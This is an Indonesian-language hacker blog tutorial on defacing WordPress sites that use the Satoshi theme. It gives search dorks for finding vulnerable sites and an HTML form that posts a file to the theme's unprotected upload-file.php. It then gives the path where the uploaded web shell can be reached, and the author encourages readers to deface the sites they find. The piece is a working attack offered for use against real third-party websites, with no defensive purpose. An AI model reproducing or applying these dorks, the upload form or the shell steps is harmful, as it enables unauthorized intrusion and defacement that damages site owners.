xixihi, hari ini Nuenomaru akan menjelaskan dan mempraktekan Tutorial Deface Wordpress Themes Satoshi menggunakan CSRF.
bagi yang belum tau CSRF o.O ?? jalan jalan dulu gih di google.
abis gak varokah kalo gunain exploit tapi gak tau asal usul dan cara kerjanya.
Founder exploit : cyber_taregh
(makasih Om Taregh, exploitnya berguna banget bagi noob kaya saya ;D )
Vendor : Voosh Themes
Dork :
Inurl:wp-content/themes/satoshi/
Inurl:"wp-content/themes/satoshi site:.com"
Baca artikel ini juga dong Om : Dorking dengan BinGoo pada Linux
Vuln : CSRF
PoC : wp-content/themes/satoshi/upload-file.php
Script CSRF :
Simpan dengan ekstensi .html (contoh.html <~ beri nama sesuai kemauan anda )
<form enctype="multipart/form-data" action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form>
ganti target.com menjadi link target anda ketika selesai berburu web menggunakan Dork diatas.
Jika sudah di edit dan di save kembali.
Buka lagi script CSRF nya menjadi kek gini:
browse ~> pilih shell sobat ~> klik upload
Bila sukses terUpload, akan muncul tampilan kek begindang :v
jika dah ada bacaan success, tinggal panggilan shell milik sobat ^_^
Shell Akses: /wp-content/themes/satoshi/images/yournameshell.php
Jika udah kaya gambar penampakan diatas >.<"
Seterah mau sobat apakan, kalo kata saya sih, cukup nitip file and patch.
Sekian tutorial dari Nuenomaru, Semoga bermanfaat ^^
Semoga Exploit kali ini dapat menghibur dunia persilatan defaced CMS Wordpress :p
Source and thanks to: Dark-Cannon Blog
./Nuenomaru
Nuenomaru Just an illusion in Cyber World
Visit and follow :
BBM : C0018D1A2
EmoticonEmoticon